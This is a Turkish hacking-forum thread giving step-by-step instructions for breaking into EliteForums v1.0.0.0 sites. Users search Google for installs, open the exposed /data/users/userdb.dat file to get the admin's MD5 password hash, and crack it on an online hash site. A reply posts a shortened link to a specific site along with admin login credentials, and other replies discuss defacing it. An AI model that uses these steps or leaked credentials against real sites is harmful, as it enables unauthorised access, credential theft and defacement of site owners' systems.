elit forums hack

mysticwolf

Üye
16 Ara 2006
60
0
başlıgımız eliteforum nasıl hacklenir.??
EliteForums v1.0.0.0 nasil hacklenir diyorsanız..!

Oncelikle google'ye giriyoruz sonra
/eliteforum/ aratıyoruz bunu
www.siteadi.com/eliteforum arattıktan sonra gelen sitenin arkasına şu kodu ekliyoruz..
/data/users/userdb.dat
yani böyle
www.siteadi.com/eliteforum/data/users/userdb.dat
ve karşımıza kodlar çıkıyor...
siz admin user ve admin pass ı ilk sırada bulabilirsiniz digerleri normal userlerinkidir buna çok dikkat edin

Kod:
<#!USER!#><#!UNAME!#>tegan<#!ENDUNAME!#><#!PWORD !# >a1d0c6e83f027327d8461063f4ac58a6<#!ENDPWORD!#>k ar şınıza böyle gelecektir açıgı varsa
tabiki size useri veriyor ama pass'ıda hemen vermiyo onu size md5 halinde veriyor sizde onu alıyorsunuz ve bir md5 kıran sitede kırıyorsunuz ve pass karşınızda...
eger md5 kıran site bilmiyosanız işte size güzel bi md5 kıran site
GData: An Online MD5 Hash Database

H@ckerB@B@

Yeni üye
30 Ağu 2008
7
0
siteyede giriş yaptım ama nasıl indexmi bascam site yabancı bir şey anlayamadım...

Son düzenleme:

hellgod

Yeni üye
1 Şub 2009
14
0
o siteye senden önce 5000 kişi girmiştir zaten elit forum diye bişey kalmadı artık bildiğim kadarıyla :)

al senin icin ben bitane buldum

https://tik.lat/0vYZe

gir buraya admin'in

ıd : dave
pass : macknife

gir eğlen altta panel var ordan yapabilirsin istediğini.

Son düzenleme:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.